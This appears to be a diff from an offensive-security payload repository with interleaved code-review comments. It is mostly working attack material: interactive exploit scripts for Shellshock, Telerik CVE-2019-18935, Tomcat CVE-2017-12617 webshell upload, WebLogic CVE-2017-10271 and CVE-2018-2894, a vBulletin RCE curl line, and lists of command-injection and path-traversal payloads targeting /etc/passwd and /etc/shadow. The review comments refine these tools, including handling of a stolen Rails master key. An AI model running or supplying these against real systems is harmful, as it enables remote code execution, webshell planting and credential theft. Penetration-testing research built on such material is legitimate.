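Review bot: The two `File.open(..., 'w')` calls write the target's `credentials.yml.enc` and `master.key` into the working directory with default permissions, and nothing removes them afterwards. Passing a mode, `File.open("master.key", "w", 0600) { |file| file.write(res.body) }`, plus a comment that the key must be treated as compromised and rotated once it has left the host, would cover that. `ENV["RAILS_MASTER_KEY"] = res.body` then uses whatever the last response was, so if none of the ten `master.key` attempts returned 200, an error page becomes the key. The outer `rescue Exception => e` discards `e` and prints only `Exiting...`, which hides the cause of any failure.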


@ -0,0 +1,36 @@
#!/usr/bin/python
# Successful Output:
# # python shell_shocker.py <VulnURL>
# [+] Attempting Shell_Shock - Make sure to type full path
# ~$ /bin/ls /
# bin
# boot
# dev
# etc
# ..
# ~$ /bin/cat /etc/passwd
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import input
import sys, urllib.request, urllib.error, urllib.parse
if len(sys.argv) != 2:
print("Usage: shell_shocker <URL>")
sys.exit(0)
URL=sys.argv[1]
print("[+] Attempting Shell_Shock - Make sure to type full path")
while True:
command=input("~$ ")
opener=urllib.request.build_opener()
opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]
try:
response=opener.open(URL)
for line in response.readlines():
print(line.strip())
except Exception as e: print(e)
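Review bot: The header comment shows sample output but not what the request looks like, which is the part a reader needs in order to recognise this traffic. I would add `# Sends "() { foo;}; echo ..." followed by the typed command in the User-Agent header; a request header value starting with "() {" is the pattern to match in logs and IDS rules`. The `while True` loop has no exit command and `input()` sits outside the `try`, so end-of-input terminates the script with a traceback. `opener.open(URL)` is also called without a timeout.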

File diff suppressed because one or more lines are too long


@ -0,0 +1,140 @@
#!/usr/bin/env python3
# origin : https://github.com/noperator/CVE-2019-18935
# INSTALL:
# git clone https://github.com/noperator/CVE-2019-18935.git && cd CVE-2019-18935
# python3 -m venv env
# source env/bin/activate
# pip3 install -r requirements.txt
# Import encryption routines.
from sys import path
path.insert(1, 'RAU_crypto')
from RAU_crypto import RAUCipher
from argparse import ArgumentParser
from json import dumps, loads
from os.path import basename, splitext
from pprint import pprint
from requests import post
from requests.packages.urllib3 import disable_warnings
from sys import stderr
from time import time
from urllib3.exceptions import InsecureRequestWarning
disable_warnings(category=InsecureRequestWarning)
def send_request(files):
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:54.0) Gecko/20100101 Firefox/54.0',
'Connection': 'close',
'Accept-Language': 'en-US,en;q=0.5',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Upgrade-Insecure-Requests': '1'
}
response = post(url, files=files, verify=False, headers=headers)
try:
result = loads(response.text)
result['metaData'] = loads(RAUCipher.decrypt(result['metaData']))
pprint(result)
except:
print(response.text)
def build_raupostdata(object, type):
return RAUCipher.encrypt(dumps(object)) + '&' + RAUCipher.encrypt(type)
def upload():
# Build rauPostData.
object = {
'TargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(''), ui_version),
'TempTargetFolder': RAUCipher.addHmac(RAUCipher.encrypt(temp_target_folder), ui_version),
'MaxFileSize': 0,
'TimeToLive': { # These values seem a bit arbitrary, but when they're all set to 0, the payload disappears shortly after being written to disk.
'Ticks': 1440000000000,
'Days': 0,
'Hours': 40,
'Minutes': 0,
'Seconds': 0,
'Milliseconds': 0,
'TotalDays': 1.6666666666666666,
'TotalHours': 40,
'TotalMinutes': 2400,
'TotalSeconds': 144000,
'TotalMilliseconds': 144000000
},
'UseApplicationPoolImpersonation': False
}
type = 'Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=' + ui_version + ', Culture=neutral, PublicKeyToken=121fae78165ba3d4'
raupostdata = build_raupostdata(object, type)
with open(filename_local, 'rb') as f:
payload = f.read()
metadata = {
'TotalChunks': 1,
'ChunkIndex': 0,
'TotalFileSize': 1,
'UploadID': filename_remote # Determines remote filename on disk.
}
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata),
'file': (filename_remote, payload, 'application/octet-stream'),
'fileName': (None, filename_remote),
'contentType': (None, 'application/octet-stream'),
'lastModifiedDate': (None, '1970-01-01T00:00:00.000Z'),
'metadata': (None, dumps(metadata))
}
# Send request.
print('[*] Local payload name: ', filename_local, file=stderr)
print('[*] Destination folder: ', temp_target_folder, file=stderr)
print('[*] Remote payload name:', filename_remote, file=stderr)
print(file=stderr)
send_request(files)
def deserialize():
# Build rauPostData.
object = {
'Path': 'file:///' + temp_target_folder.replace('\\', '/') + '/' + filename_remote
}
type = 'System.Configuration.Install.AssemblyInstaller, System.Configuration.Install, Version=' + net_version + ', Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a'
raupostdata = build_raupostdata(object, type)
# Build multipart form data.
files = {
'rauPostData': (None, raupostdata), # Only need this now.
'': '' # One extra input is required for the page to process the request.
}
# Send request.
print('\n[*] Triggering deserialization for .NET v' + net_version + '...\n', file=stderr)
start = time()
send_request(files)
end = time()
print('\n[*] Response time:', round(end - start, 2), 'seconds', file=stderr)
if __name__ == '__main__':
parser = ArgumentParser(description='Exploit for CVE-2019-18935, a .NET deserialization vulnerability in Telerik UI for ASP.NET AJAX.')
parser.add_argument('-t', dest='test_upload', action='store_true', help="just test file upload, don't exploit deserialization vuln")
parser.add_argument('-v', dest='ui_version', required=True, help='software version')
parser.add_argument('-n', dest='net_version', default='4.0.0.0', help='.NET version')
parser.add_argument('-p', dest='payload', required=True, help='mixed mode assembly DLL')
parser.add_argument('-f', dest='folder', required=True, help='destination folder on target')
parser.add_argument('-u', dest='url', required=True, help='https://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau')
args = parser.parse_args()
temp_target_folder = args.folder.replace('/', '\\')
ui_version = args.ui_version
net_version = args.net_version
filename_local = args.payload
filename_remote = str(time()) + splitext(basename(filename_local))[1]
url = args.url
upload()
if not args.test_upload:
deserialize()
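Review bot: The bare `except:` in `send_request` catches everything, including `KeyboardInterrupt`, and falls back to printing the raw body, so a decryption or parsing failure looks the same as an ordinary non-JSON reply. Narrowing it to `except (ValueError, KeyError):` would be a start, though `RAUCipher.decrypt` is defined outside this file and may raise other types. The locals named `object` and `type` in `upload` and `deserialize` shadow the builtins; `obj` and `type_name` read better. The uploaded file stays in `temp_target_folder` under `filename_remote`, and the inline comment on `TimeToLive` suggests it persists for the configured 40 hours, so the header should say so in order that the path ends up in the test report.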


@ -0,0 +1,239 @@
#!/usr/bin/python
# From https://github.com/cyberheartmi9/CVE-2017-12617/blob/master/tomcat-cve-2017-12617.py
"""
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
"""
from __future__ import print_function
from builtins import input
from builtins import str
from builtins import object
import requests
import re
import signal
from optparse import OptionParser
class bcolors(object):
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
banner="""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
[@intx0x80]
"""
def signal_handler(signal, frame):
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
exit()
signal.signal(signal.SIGINT, signal_handler)
def removetags(tags):
remove = re.compile('<.*?>')
txt = re.sub(remove, '\n', tags)
return txt.replace("\n\n\n","\n")
def getContent(url,f):
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
re=requests.get(str(url)+"/"+str(f), headers=headers)
return re.content
def createPayload(url,f):
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers)
if req.status_code==201:
print("File Created ..")
def RCE(url,f):
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers)
def shell(url,f):
while True:
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
cmd=input("$ ")
payload={'cmd':cmd}
if cmd=="q" or cmd=="Q":
break
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers)
re=str(re.content)
t=removetags(re)
print(t)
#print bcolors.HEADER+ banner+bcolors.ENDC
parse=OptionParser(
bcolors.HEADER+"""
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
./cve-2017-12617.py [options]
options:
-u ,--url [::] check target url if it's vulnerable
-p,--pwn [::] generate webshell and upload it
-l,--list [::] hosts list
[+]usage:
./cve-2017-12617.py -u http://127.0.0.1
./cve-2017-12617.py --url http://127.0.0.1
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
./cve-2017-12617.py -l hotsts.txt
./cve-2017-12617.py --list hosts.txt
[@intx0x80]
"""+bcolors.ENDC
)
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
(opt,args)=parse.parse_args()
if opt.U==None and opt.P==None and opt.L==None:
print(parse.usage)
exit(0)
else:
if opt.U!=None and opt.P==None and opt.L==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
url=str(opt.U)
checker="Poc.jsp"
print(bcolors.BOLD +"Poc Filename {}".format(checker))
createPayload(str(url)+"/",checker)
con=getContent(str(url)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print(bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC)
print(bcolors.WARNING+url+"/"+checker+bcolors.ENDC)
else:
print('Not Vulnerable to CVE-2017-12617 ')
elif opt.P!=None and opt.U!=None and opt.L==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
pwn=str(opt.P)
url=str(opt.U)
print("Uploading Webshell .....")
pwn=pwn+".jsp"
RCE(str(url)+"/",pwn)
shell(str(url),pwn)
elif opt.L!=None and opt.P==None and opt.U==None:
print(bcolors.OKGREEN+banner+bcolors.ENDC)
w=str(opt.L)
f=open(w,"r")
print("Scaning hosts in {}".format(w))
checker="Poc.jsp"
for i in f.readlines():
i=i.strip("\n")
createPayload(str(i)+"/",checker)
con=getContent(str(i)+"/",checker)
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
print(str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m")

File diff suppressed because one or more lines are too long


@ -0,0 +1,63 @@
from __future__ import print_function
from builtins import input
import requests
import sys
url_in = sys.argv[1]
payload_url = url_in + "/wls-wsat/CoordinatorPortType"
payload_header = {'content-type': 'text/xml'}
def payload_command (command_in):
html_escape_table = {
"&": "&amp;",
'"': "&quot;",
"'": "&apos;",
">": "&gt;",
"<": "&lt;",
}
command_filtered = "<string>"+"".join(html_escape_table.get(c, c) for c in command_in)+"</string>"
payload_1 = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"> \n" \
" <soapenv:Header> " \
" <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\"> \n" \
" <java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\"> \n" \
" <void class=\"java.lang.ProcessBuilder\"> \n" \
" <array class=\"java.lang.String\" length=\"3\">" \
" <void index = \"0\"> " \
" <string>cmd</string> " \
" </void> " \
" <void index = \"1\"> " \
" <string>/c</string> " \
" </void> " \
" <void index = \"2\"> " \
+ command_filtered + \
" </void> " \
" </array>" \
" <void method=\"start\"/>" \
" </void>" \
" </java>" \
" </work:WorkContext>" \
" </soapenv:Header>" \
" <soapenv:Body/>" \
"</soapenv:Envelope>"
return payload_1
def do_post(command_in):
result = requests.post(payload_url, payload_command(command_in ),headers = payload_header)
if result.status_code == 500:
print("Command Executed \n")
else:
print("Something Went Wrong \n")
print("***************************************************** \n" \
"**************** Coded By 1337g ****************** \n" \
"* CVE-2017-10271 Blind Remote Command Execute EXP * \n" \
"***************************************************** \n")
while 1:
command_in = input("Eneter your command here: ")
if command_in == "exit" : exit(0)
do_post(command_in)
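Review bot: `url_in = sys.argv[1]` runs at module level with no argument check, so starting the script without a URL ends in an IndexError traceback instead of a usage line; guard it with `if len(sys.argv) != 2: sys.exit("usage: %s <url>" % sys.argv[0])`. `do_post` calls `requests.post` without `timeout=`, so an unresponsive host blocks the prompt loop indefinitely. The "Command Executed" message is printed for any HTTP 500 even though the banner describes the technique as blind; wording such as "HTTP 500 returned, execution not confirmed" would keep an assessment report from overstating the result.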


@ -0,0 +1,128 @@
#!/usr/bin/env python
# coding:utf-8
# Build By LandGrey
from __future__ import print_function
from builtins import str
import re
import sys
import time
import argparse
import requests
import traceback
import xml.etree.ElementTree as ET
def get_current_work_path(host):
geturl = host + "/ws_utc/resources/setting/options/general"
ua = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:49.0) Gecko/20100101 Firefox/49.0'}
values = []
try:
request = requests.get(geturl)
if request.status_code == 404:
exit("[-] {} don't exists CVE-2018-2894".format(host))
elif "Deploying Application".lower() in request.text.lower():
print("[*] First Deploying Website Please wait a moment ...")
time.sleep(20)
request = requests.get(geturl, headers=ua)
if "</defaultValue>" in request.content:
root = ET.fromstring(request.content)
value = root.find("section").find("options")
for e in value:
for sub in e:
if e.tag == "parameter" and sub.tag == "defaultValue":
values.append(sub.text)
except requests.ConnectionError:
exit("[-] Cannot connect url: {}".format(geturl))
if values:
return values[0]
else:
print("[-] Cannot get current work path\n")
exit(request.content)
def get_new_work_path(host):
origin_work_path = get_current_work_path(host)
works = "/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css"
if "user_projects" in origin_work_path:
if "\\" in origin_work_path:
works = works.replace("/", "\\")
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects\\domains"
dir_len = len(current_work_home.split("\\"))
domain_name = origin_work_path.split("\\")[dir_len]
current_work_home += "\\" + domain_name + works
else:
current_work_home = origin_work_path[:origin_work_path.find("user_projects")] + "user_projects/domains"
dir_len = len(current_work_home.split("/"))
domain_name = origin_work_path.split("/")[dir_len]
current_work_home += "/" + domain_name + works
else:
current_work_home = origin_work_path
print("[*] cannot handle current work home dir: {}".format(origin_work_path))
return current_work_home
def set_new_upload_path(host, path):
data = {
"setting_id": "general",
"BasicConfigOptions.workDir": path,
"BasicConfigOptions.proxyHost": "",
"BasicConfigOptions.proxyPort": "80"}
request = requests.post(host + "/ws_utc/resources/setting/options", data=data, headers=headers)
if "successfully" in request.content:
return True
else:
print("[-] Change New Upload Path failed")
exit(request.content)
def upload_webshell(host, uri):
set_new_upload_path(host, get_new_work_path(host))
files = {
"ks_edit_mode": "false",
"ks_password_front": password,
"ks_password_changed": "true",
"ks_filename": ("360sglab.jsp", upload_content)
}
request = requests.post(host + uri, files=files)
response = request.text
match = re.findall("<id>(.*?)</id>", response)
if match:
tid = match[-1]
shell_path = host + "/ws_utc/css/config/keystore/" + str(tid) + "_360sglab.jsp"
if upload_content in requests.get(shell_path, headers=headers).content:
print("[+] {} exists CVE-2018-2894".format(host))
print("[+] Check URL: {} ".format(shell_path))
else:
print("[-] {} don't exists CVE-2018-2894".format(host))
else:
print("[-] {} don't exists CVE-2018-2894".format(host))
if __name__ == "__main__":
start = time.time()
password = "360sglab"
url = "/ws_utc/resources/setting/keystore"
parser = argparse.ArgumentParser()
parser.add_argument("-t", dest='target', default="http://127.0.0.1:7001", type=str,
help="target, such as: http://example.com:7001")
upload_content = "360sglab test"
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
'X-Requested-With': 'XMLHttpRequest', }
if len(sys.argv) == 1:
sys.argv.append('-h')
args = parser.parse_args()
target = args.target
target = target.rstrip('/')
if "://" not in target:
target = "http://" + target
try:
upload_webshell(target, url)
except Exception as e:
print("[-] Error: \n")
traceback.print_exc()
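Review bot: `upload_webshell` changes the server's `BasicConfigOptions.workDir` through `set_new_upload_path` and never writes the original value back, so a host that was only being checked is left with a modified test-client setting and the uploaded `_360sglab.jsp` marker file. `get_current_work_path` already returns the original path; keep it (`original = get_current_work_path(host)`) and call `set_new_upload_path(host, original)` in a `finally:` around the check, and print the marker file's URL in every branch so it can be removed afterwards. A module docstring listing these two side effects would help whoever has to clean up or triage the resulting alerts. None of the `requests` calls pass `timeout=`.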

File diff suppressed because one or more lines are too long

5994
CVE Exploits/index.html Normal file

File diff suppressed because one or more lines are too long


@ -0,0 +1 @@
curl https://example.com/index.php\?routestring\=ajax/render/widget_php --connect-timeout 5 --max-time 15 -s -k --data "widgetConfig[code]=echo system('id');exit;"

6287
Clickjacking/index.html Normal file

File diff suppressed because one or more lines are too long


@ -0,0 +1,83 @@
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/passwd&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/bin/cat%20/etc/shadow&quot;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
&lt;!--#exec%20cmd=&quot;/usr/bin/id;--&gt;
/index.html|id|
";id;"
';id;'
;id;
;id
;netstat -a;
"|id|"
'|id|'
|id
|/usr/bin/id
|id|
"|/usr/bin/id|"
'|/usr/bin/id|'
|/usr/bin/id|
"||/usr/bin/id|"
'||/usr/bin/id|'
||/usr/bin/id|
|id;
||/usr/bin/id;
;id|
;|/usr/bin/id|
"\n/bin/ls -al\n"
'\n/bin/ls -al\n'
\n/bin/ls -al\n
\n/usr/bin/id\n
\nid\n
\n/usr/bin/id;
\nid;
\n/usr/bin/id|
\nid|
;/usr/bin/id\n
;id\n
|usr/bin/id\n
|nid\n
`id`
`/usr/bin/id`
a);id
a;id
a);id;
a;id;
a);id|
a;id|
a)|id
a|id
a)|id;
a|id
|/bin/ls -al
a);/usr/bin/id
a;/usr/bin/id
a);/usr/bin/id;
a;/usr/bin/id;
a);/usr/bin/id|
a;/usr/bin/id|
a)|/usr/bin/id
a|/usr/bin/id
a)|/usr/bin/id;
a|/usr/bin/id
;system('cat%20/etc/passwd')
;system('id')
;system('/usr/bin/id')
%0Acat%20/etc/passwd
%0A/usr/bin/id
%0Aid
%22%0A/usr/bin/id%0A%22
%27%0A/usr/bin/id%0A%27
%0A/usr/bin/id%0A
%0Aid%0A
"& ping -i 30 127.0.0.1 &"
'& ping -i 30 127.0.0.1 &'
& ping -i 30 127.0.0.1 &
& ping -n 30 127.0.0.1 &
%0a ping -i 30 127.0.0.1 %0a
`ping 127.0.0.1`
| id
& id
; id
%0a id %0a
`id`
$;/usr/bin/id

File diff suppressed because one or more lines are too long

6661
Command Injection/index.html Normal file

File diff suppressed because one or more lines are too long

5937
DNS Rebinding/index.html Normal file

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long


@ -0,0 +1,140 @@
\..\WINDOWS\win.ini
\..\..\WINDOWS\win.ini
\..\..\..\WINDOWS\win.ini
\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\WINDOWS\win.ini
\..\..\..\..\..\..\WINDOWS\win.ini
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c
../../../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34
../../../.htaccess
../../.htaccess
../.htaccess
.htaccess
././.htaccess
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%2e%2f%2e%68%74%61%63%63%65%73%73
%2e%68%74%61%63%63%65%73%73
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33
../../../../../../../../../../../../etc/hosts%00
../../../../../../../../../../../../etc/hosts
../../boot.ini
/../../../../../../../../%2A
../../../../../../../../../../../../etc/passwd%00
../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/shadow%00
../../../../../../../../../../../../etc/shadow
/../../../../../../../../../../etc/passwd^^
/../../../../../../../../../../etc/shadow^^
/../../../../../../../../../../etc/passwd
/../../../../../../../../../../etc/shadow
/./././././././././././etc/passwd
/./././././././././././etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd
\..\..\..\..\..\..\..\..\..\..\etc\shadow
..\..\..\..\..\..\..\..\..\..\etc\passwd
..\..\..\..\..\..\..\..\..\..\etc\shadow
/..\../..\../..\../..\../..\../..\../etc/passwd
/..\../..\../..\../..\../..\../..\../etc/shadow
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00
